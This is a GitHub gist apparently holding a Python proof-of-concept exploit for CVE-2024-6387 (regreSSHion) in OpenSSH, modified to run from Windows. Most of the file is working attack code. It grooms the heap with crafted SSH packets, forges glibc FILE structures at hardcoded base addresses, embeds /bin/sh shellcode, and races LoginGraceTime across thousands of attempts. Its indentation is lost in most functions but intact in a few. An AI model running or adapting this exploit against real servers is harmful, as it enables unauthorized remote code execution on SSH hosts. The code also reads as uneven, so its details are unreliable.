Skip to content

Instantly share code, notes, and snippets.

@siteslave
Created March 19, 2026 04:50
Show Gist options
  • Select an option

  • Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.

Select an option

Save siteslave/aeddba7236bb889ff47df37249cf4433 to your computer and use it in GitHub Desktop.
CVE-2024-6387
#!/usr/bin/env python3
"""
CVE-2024-6387 PoC - Windows Fixed Version
Resolves WinError 10022 and other Windows socket issues
"""
import socket
import struct
import time
import sys
import os
import errno
import select
import argparse
from datetime import datetime
# ============================================================================
# Platform Detection & Configuration
# ============================================================================
IS_WINDOWS = sys.platform.startswith('win')
IS_LINUX = sys.platform.startswith('linux')
MAX_PACKET_SIZE = 256 * 1024
LOGIN_GRACE_TIME = 120
# Windows-specific timing adjustments
if IS_WINDOWS:
TIMING_PRECISION = 0.002
SOCKET_TIMEOUT = 3.0
CONNECT_TIMEOUT = 5.0
else:
TIMING_PRECISION = 0.001
SOCKET_TIMEOUT = 1.0
CONNECT_TIMEOUT = 3.0
def chunk_align(size):
return (size + 15) & ~15
# glibc base addresses (ปรับตามเป้าหมาย)
GLIBC_BASES = [0xb7200000, 0xb7400000, 0xb7600000]
# Shellcode placeholder
SHELLCODE = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"
)
# ============================================================================
# Logging Functions
# ============================================================================
def log(msg, level="INFO"):
    """Print a timestamped, level-tagged message to stdout.

    Args:
        msg: Text to print.
        level: Severity tag shown in brackets. It also selects the ANSI
            colour; levels missing from the colour table print uncoloured.
    """
    # "%f" yields microseconds; dropping the last three digits leaves ms.
    timestamp = datetime.now().strftime("%H:%M:%S.%f")[:-3]
    colors = {
        "INFO": "\033[94m",
        "SUCCESS": "\033[92m",
        "WARNING": "\033[93m",
        "ERROR": "\033[91m",
        "DEBUG": "\033[90m",
    }
    # Colour and reset must be switched off together. Previously only the
    # reset was blanked on Windows, so the colour prefix was still written
    # with nothing to undo it.
    if IS_WINDOWS:
        color = reset = ""
    else:
        color = colors.get(level, "")
        reset = "\033[0m"
    print(f"{color}[{timestamp}] [{level}] {msg}{reset}")
def log_debug(msg):
    """Emit *msg* at DEBUG level, but only when verbose output is enabled.

    Verbosity is read from the module-level ``args`` namespace that
    ``main()`` installs. If that global has not been set yet (for example
    when a helper is called before ``main()`` runs), the message is
    dropped instead of raising ``NameError``.

    Args:
        msg: Text to log.
    """
    cli_args = globals().get("args")
    if getattr(cli_args, "verbose", False):
        log(msg, "DEBUG")
# ============================================================================
# Socket Functions - FIXED FOR WINDOWS
# ============================================================================
def setup_connection(ip, port):
"""
Create TCP connection - FIXED to avoid WinError 10022
"""
sock = None
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ✅ FIXED: Set socket options BEFORE connect, and only compatible ones
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# ❌ REMOVED: SO_EXCLUSIVEADDRUSE causes WinError 10022 on some Windows versions
# if IS_WINDOWS:
# sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
if IS_WINDOWS:
# Windows: Use blocking mode for connect (more reliable)
sock.settimeout(CONNECT_TIMEOUT)
log_debug(f"Connecting to {ip}:{port}...")
sock.connect((ip, port))
# Switch to non-blocking after connection established
sock.setblocking(False)
log_debug("Connected, switched to non-blocking mode")
else:
# Linux: Non-blocking connect
sock.setblocking(False)
result = sock.connect_ex((ip, port))
if result == 0:
pass
elif result == errno.EINPROGRESS:
_, writable, _ = select.select([], [sock], [], CONNECT_TIMEOUT)
if not writable:
log("Connection timeout", "ERROR")
sock.close()
return None
err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if err != 0:
log(f"Connection failed: {os.strerror(err)}", "ERROR")
sock.close()
return None
else:
log(f"Connect error: {os.strerror(result)}", "ERROR")
sock.close()
return None
return sock
except socket.timeout:
log("Connection timeout", "ERROR")
except ConnectionRefusedError:
log(f"Connection refused by {ip}:{port}", "ERROR")
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10061:
log("Connection refused (WinError 10061)", "ERROR")
elif win_err == 10060:
log("Connection timeout (WinError 10060)", "ERROR")
elif win_err == 10022:
log("Invalid argument (WinError 10022) - check socket options", "ERROR")
else:
log(f"Socket OS error (winerror={win_err}): {e}", "ERROR")
except Exception as e:
log(f"setup_connection error: {type(e).__name__}: {e}", "ERROR")
if sock:
try:
sock.close()
except:
pass
return None
def is_socket_connected(sock):
"""Check if socket is still connected"""
if sock is None:
return False
try:
sock.getpeername()
if IS_WINDOWS:
try:
_, _, err = select.select([], [], [sock], 0)
if err:
return False
except:
return False
return True
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err in [10053, 10054, 10038, 10057, 10022]:
return False
return False
except:
return False
def send_packet(sock, packet_type, data, allow_partial=False):
"""Send SSH packet - Windows-compatible"""
if not is_socket_connected(sock):
log("Cannot send: socket disconnected", "ERROR")
return False
try:
packet_len = len(data) + 5
header = struct.pack('>I', packet_len)
packet = header + bytes([packet_type]) + data
# Windows: Send in chunks for large packets
if IS_WINDOWS and len(packet) > 16384:
chunk_size = 16384
total_sent = 0
while total_sent < len(packet):
chunk = packet[total_sent:total_sent + chunk_size]
sent = sock.send(chunk)
if sent == 0:
log("Socket send returned 0", "ERROR")
return False
total_sent += sent
if total_sent < len(packet):
time.sleep(0.001)
else:
sock.sendall(packet)
log_debug(f"Sent packet: type={packet_type}, len={len(packet)}")
return True
except BrokenPipeError:
log("Broken pipe - server closed connection", "WARNING")
return False
except ConnectionResetError:
log("Connection reset by peer", "WARNING")
return False
except ConnectionAbortedError:
log("Connection aborted", "WARNING")
return False
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("[WinError 10053] Connection aborted", "WARNING")
return False
elif win_err == 10054:
log("[WinError 10054] Connection reset", "WARNING")
return False
elif win_err == 10022:
log("[WinError 10022] Invalid argument - socket may be invalid", "ERROR")
return False
elif win_err == 10035: # WSAEWOULDBLOCK
if allow_partial:
return True
log("Socket would block", "WARNING")
return False
else:
log(f"send_packet OSError (winerror={win_err}): {e}", "ERROR")
return False
except Exception as e:
log(f"send_packet error: {type(e).__name__}: {e}", "ERROR")
return False
def recv_nonblocking(sock, bufsize, timeout=None):
"""Receive data with timeout"""
if timeout is None:
timeout = SOCKET_TIMEOUT
start = time.monotonic()
data = b""
while True:
elapsed = time.monotonic() - start
if elapsed >= timeout:
break
try:
chunk = sock.recv(bufsize)
if chunk:
data += chunk
break
if not chunk:
break
except BlockingIOError:
time.sleep(0.01 if IS_WINDOWS else 0.001)
continue
except ConnectionResetError:
break
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err in [10053, 10054, 10022]:
break
elif win_err == 10035:
time.sleep(0.01 if IS_WINDOWS else 0.001)
continue
else:
break
except:
break
return data
# ============================================================================
# SSH Protocol Functions
# ============================================================================
def send_ssh_version(sock):
version = b"SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n"
try:
sock.sendall(version)
return True
except Exception as e:
log(f"send_ssh_version error: {e}", "ERROR")
return False
def receive_ssh_version(sock, timeout=3.0):
try:
data = recv_nonblocking(sock, 256, timeout=timeout)
if data:
try:
log(f"Received SSH version: {data.decode('ascii', errors='replace').strip()}")
except:
log(f"Received: {data[:50]}", "DEBUG")
return True
except Exception as e:
log(f"receive_ssh_version error: {e}", "DEBUG")
log("Failed to receive SSH version", "ERROR")
return False
def send_kex_init(sock):
kexinit_payload = bytes(36)
return send_packet(sock, 20, kexinit_payload)
def receive_kex_init(sock, timeout=2.0):
try:
data = recv_nonblocking(sock, 2048, timeout=timeout)
if data and len(data) >= 5:
log(f"Received KEX_INIT ({len(data)} bytes)", "DEBUG")
return True
except Exception as e:
log(f"receive_kex_init error: {e}", "DEBUG")
return False
def perform_ssh_handshake(sock):
log("Performing SSH handshake...", "DEBUG")
if not send_ssh_version(sock):
return False
if not receive_ssh_version(sock):
return False
if not send_kex_init(sock):
return False
return True
# ============================================================================
# Heap Manipulation Functions
# ============================================================================
def prepare_heap(sock):
log("Preparing heap layout...", "DEBUG")
for i in range(10):
tcache_chunk = b'A' * 64
send_packet(sock, 5, tcache_chunk)
for i in range(27):
large_hole = b'B' * 8192
send_packet(sock, 5, large_hole)
small_hole = b'C' * 320
send_packet(sock, 5, small_hole)
for i in range(27):
fake_data = create_fake_file_structure(4096, GLIBC_BASES[0])
send_packet(sock, 5, fake_data)
large_string = b'E' * (MAX_PACKET_SIZE - 1)
send_packet(sock, 5, large_string)
log("Heap preparation complete", "DEBUG")
def create_fake_file_structure(size, glibc_base):
data = bytearray(size)
struct.pack_into('<I', data, 0x88, 0x61)
fake_vtable = glibc_base + 0x21b740
fake_codecvt = glibc_base + 0x21d7f8
struct.pack_into('<I', data, size - 8, fake_vtable & 0xFFFFFFFF)
struct.pack_into('<I', data, size - 4, fake_codecvt & 0xFFFFFFFF)
return bytes(data)
# ============================================================================
# Timing Functions
# ============================================================================
def measure_response_time(sock, error_type, timeout=1.0):
if error_type == 1:
error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3"
else:
error_packet = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9"
start = time.monotonic()
send_packet(sock, 50, error_packet)
recv_nonblocking(sock, 1024, timeout=timeout)
end = time.monotonic()
return end - start
def time_final_packet(sock):
log("Measuring packet parsing time...", "DEBUG")
times = []
for error_type in [1, 2, 1, 2]:
t = measure_response_time(sock, error_type)
times.append(t)
time.sleep(0.01)
times.sort()
parsing_time = (times[1] + times[2]) / 2 if len(times) >= 4 else times[0]
log(f"Estimated parsing time: {parsing_time:.6f} seconds", "INFO")
return parsing_time
# ============================================================================
# Exploit Core Functions
# ============================================================================
def create_public_key_packet(size, glibc_base):
packet = bytearray(size)
offset = 0
for i in range(27):
large_size = chunk_align(4096)
struct.pack_into('<I', packet, offset, large_size)
offset += large_size
small_size = chunk_align(304)
struct.pack_into('<I', packet, offset, small_size)
offset += small_size
packet[0:8] = b"ssh-rsa "
shellcode_offset = chunk_align(4096) * 13 + chunk_align(304) * 13
if shellcode_offset + len(SHELLCODE) <= size:
packet[shellcode_offset:shellcode_offset+len(SHELLCODE)] = SHELLCODE
for i in range(27):
file_offset = chunk_align(4096) * (i + 1) + chunk_align(304) * i
if file_offset + 304 <= size:
fake_file = create_fake_file_structure(304, glibc_base)
packet[file_offset:file_offset+304] = fake_file[:304]
return bytes(packet)
def attempt_race_condition(sock, parsing_time, glibc_base):
log(f"Attempting race condition (glibc: 0x{glibc_base:x})...", "INFO")
if not is_socket_connected(sock):
log("Socket disconnected before exploit", "ERROR")
return False
final_packet = create_public_key_packet(MAX_PACKET_SIZE, glibc_base)
try:
log_debug(f"Sending packet body ({len(final_packet)-1} bytes)...")
if not send_packet(sock, 5, final_packet[:-1], allow_partial=True):
log("Failed to send packet body", "WARNING")
return False
timing_buffer = TIMING_PRECISION * 2
target_elapsed = LOGIN_GRACE_TIME - parsing_time - timing_buffer
if target_elapsed < 0:
log(f"Invalid timing: {target_elapsed:.3f}s", "ERROR")
return False
log_debug(f"Target send time: {target_elapsed:.3f}s")
start = time.monotonic()
while True:
if not is_socket_connected(sock):
log("Connection lost during timing", "WARNING")
return False
elapsed = time.monotonic() - start
remaining = target_elapsed - elapsed
if remaining <= 0:
log_debug(f"Sending final byte at {elapsed:.6f}s")
try:
sock.sendall(final_packet[-1:])
break
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("Connection aborted on final byte", "WARNING")
return False
raise
except Exception as e:
log(f"Error sending final byte: {e}", "ERROR")
return False
sleep_time = min(0.002 if IS_WINDOWS else 0.0005, max(0, remaining * 0.1))
if sleep_time > 0:
time.sleep(sleep_time)
log("Checking for exploitation indicators...", "DEBUG")
try:
sock.settimeout(0.05 if IS_WINDOWS else 0.02)
response = sock.recv(1024)
sock.setblocking(False)
if response:
log(f"Received {len(response)} bytes post-exploit", "DEBUG")
if not response.startswith(b"SSH-2.0-"):
log("Possible race window hit!", "SUCCESS")
return True
except socket.timeout:
log("No response - ambiguous result", "WARNING")
return True
except ConnectionResetError:
log("Connection reset - possible success!", "SUCCESS")
return True
except OSError as e:
win_err = getattr(e, 'winerror', None)
if win_err == 10053:
log("Connection aborted post-exploit", "WARNING")
return True
raise
except Exception as e:
log(f"attempt_race_condition error: {type(e).__name__}: {e}", "ERROR")
return False
return False
# ============================================================================
# Main Exploit Loop
# ============================================================================
def exploit_target(ip, port, max_attempts=20000):
log(f"Targeting {ip}:{port}", "INFO")
log(f"Max attempts: {max_attempts}", "INFO")
log(f"Platform: {'Windows' if IS_WINDOWS else 'Linux/Unix'}", "INFO")
if IS_WINDOWS:
log("⚠️ Windows detected: timing precision ~2ms", "WARNING")
success = False
total_attempts = 0
for base_idx, glibc_base in enumerate(GLIBC_BASES):
if success:
break
log(f"\n[*] glibc base: 0x{glibc_base:x}", "INFO")
for attempt in range(max_attempts // len(GLIBC_BASES)):
total_attempts += 1
if attempt % 1000 == 0 and attempt > 0:
log(f"Progress: {attempt}/{max_attempts // len(GLIBC_BASES)}", "INFO")
sock = setup_connection(ip, port)
if not sock:
continue
if not perform_ssh_handshake(sock):
sock.close()
continue
prepare_heap(sock)
parsing_time = time_final_packet(sock)
if attempt_race_condition(sock, parsing_time, glibc_base):
log(f"\n[!] Possible success!", "SUCCESS")
log(f" Attempts: {total_attempts}", "SUCCESS")
success = True
break
try:
sock.close()
except:
pass
time.sleep(0.1)
log(f"\nComplete. Total attempts: {total_attempts}", "INFO")
return success
# ============================================================================
# Debug & Utility Functions
# ============================================================================
def debug_connection_test(ip, port):
log(f"Debug: Testing {ip}:{port}", "INFO")
sock = setup_connection(ip, port)
if not sock:
log("Debug: Failed to connect", "ERROR")
return False
log("Debug: Connected", "SUCCESS")
if send_ssh_version(sock):
log("Debug: Sent version", "SUCCESS")
else:
log("Debug: Failed to send version", "ERROR")
sock.close()
return False
response = recv_nonblocking(sock, 256, timeout=3.0)
if response:
log(f"Debug: Received: {response[:100]}", "INFO")
else:
log("Debug: No response", "WARNING")
if send_packet(sock, 5, b"test"):
log("Debug: Sent test packet", "SUCCESS")
else:
log("Debug: Failed test packet", "WARNING")
sock.close()
log("Debug: Complete", "INFO")
return True
def check_target_version(ip, port):
    """Read the SSH banner from ``ip:port`` and report the OpenSSH release.

    The verdict is based only on the version string the server advertises.
    NOTE(review): distributions often backport fixes without changing that
    string, so a "MAY BE VULNERABLE" result needs confirming against the
    vendor's package changelog.

    Args:
        ip: Host to connect to (IPv4, as the socket is AF_INET).
        port: TCP port of the SSH service.

    Returns:
        True if a banner was read (whatever the verdict), False if the
        connection or read failed.
    """
    log(f"Checking OpenSSH version on {ip}:{port}...", "INFO")
    max_banner_bytes = 4096  # stop reading if the peer never sends a newline
    try:
        # The context manager closes the socket on every path, including
        # connect/recv failures, which previously leaked it.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(5.0)
            sock.connect((ip, port))
            banner = b""
            while b"\n" not in banner and len(banner) < max_banner_bytes:
                chunk = sock.recv(256)
                if not chunk:
                    break
                banner += chunk
    except Exception as e:
        # Boundary of a CLI check: report the failure rather than raise.
        log(f"Version check error: {e}", "ERROR")
        return False

    banner_str = banner.decode('ascii', errors='replace').strip()
    log(f"Banner: {banner_str}", "INFO")
    if "OpenSSH_" in banner_str:
        tokens = banner_str.split("OpenSSH_", 1)[1].split()
        version_part = tokens[0] if tokens else ""
        log(f"Version: {version_part}", "INFO")
        try:
            # "9.6p1" -> "9.6.1" -> (9, 6)
            major, minor = map(int, version_part.replace('p', '.').split('.')[:2])
        except ValueError:
            log("Could not parse version", "WARNING")
        else:
            release = (major, minor)
            if release < (4, 4):
                # The original signal-handler race predates 4.4p1; those
                # releases are affected unless backport-patched.
                log("⚠️ MAY BE VULNERABLE (pre-4.4p1 unless patched for "
                    "CVE-2006-5051 / CVE-2008-4109)", "WARNING")
            elif (8, 5) <= release < (9, 8):
                log("⚠️ MAY BE VULNERABLE", "WARNING")
            else:
                log("✓ Appears patched", "SUCCESS")
    return True
# ============================================================================
# Entry Point
# ============================================================================
def parse_arguments():
parser = argparse.ArgumentParser(
description="CVE-2024-6387 PoC (Windows-Fixed)"
)
parser.add_argument("target", help="Target IP")
parser.add_argument("port", type=int, nargs="?", default=22, help="Port (default: 22)")
parser.add_argument("-a", "--attempts", type=int, default=20000, help="Max attempts")
parser.add_argument("-g", "--glibc", action="append", type=lambda x: int(x, 16), help="glibc base (hex)")
parser.add_argument("-c", "--check", action="store_true", help="Check version only")
parser.add_argument("-d", "--debug", action="store_true", help="Debug connection")
parser.add_argument("-v", "--verbose", action="store_true", help="Verbose output")
return parser.parse_args()
def main():
global args
args = parse_arguments()
if args.glibc:
GLIBC_BASES[:] = args.glibc
if args.debug:
return 0 if debug_connection_test(args.target, args.port) else 1
if args.check:
return 0 if check_target_version(args.target, args.port) else 1
print("=" * 70)
print("CVE-2024-6387 regreSSHion - Windows-Fixed PoC")
print("=" * 70)
print("[!] EDUCATIONAL USE ONLY")
print("[!] Use in authorized environments only")
print("=" * 70)
try:
result = exploit_target(args.target, args.port, max_attempts=args.attempts)
return 0 if result else 1
except KeyboardInterrupt:
log("\nInterrupted", "INFO")
return 130
except Exception as e:
log(f"Fatal: {type(e).__name__}: {e}", "ERROR")
if args.verbose:
import traceback
traceback.print_exc()
return 2
if __name__ == "__main__":
sys.exit(main())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment